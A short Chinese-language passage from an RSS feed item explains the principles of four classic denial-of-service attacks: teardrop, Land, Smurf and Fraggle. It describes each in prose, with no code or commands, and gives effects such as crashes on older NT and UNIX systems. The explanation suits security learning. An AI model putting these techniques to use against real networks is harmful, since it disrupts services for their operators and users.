<P>5. 泪滴(teardrop)攻击<BR>泪滴攻击是利用在TCP/IP堆栈中实现信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指明该分段所包含的是原包的哪一段的信息，某些TCP/IP(包括service pack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。 </P>
<P>6. Land攻击 <BR>Land攻击原理是：用一个特别打造的SYN包，它的原地址和目标地址都被设置成某一个服务器地址。此举将导致接受服务器向它自己的地址发送SYN-ACK消息，结果这个地址又发回ACK消息并创建一个空连接。被攻击的服务器每接收一个这样的连接都将保留，直到超时，对Land攻击反应不同，许多UNIX实现将崩溃，NT变的极其缓慢(大约持续5分钟)。</P>
<P>7. Smurf攻击<BR>一个简单的Smurf攻击原理就是：通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行。最终导致该网络的所有主机都对此ICMP应答请求作出答复，导致网络阻塞。它比ping of death洪水的流量高出1或2个数量级。更加复杂的Smurf将源地址改为第三方的受害者，最终导致第三方崩溃。</P>
<P>8.Fraggle攻击 <BR>原理：Fraggle攻击实际上就是对Smurf攻击作了简单的修改，使用的是UDP应答消息而非ICMP。</P>]]></description>
</item>
</channel>
</rss>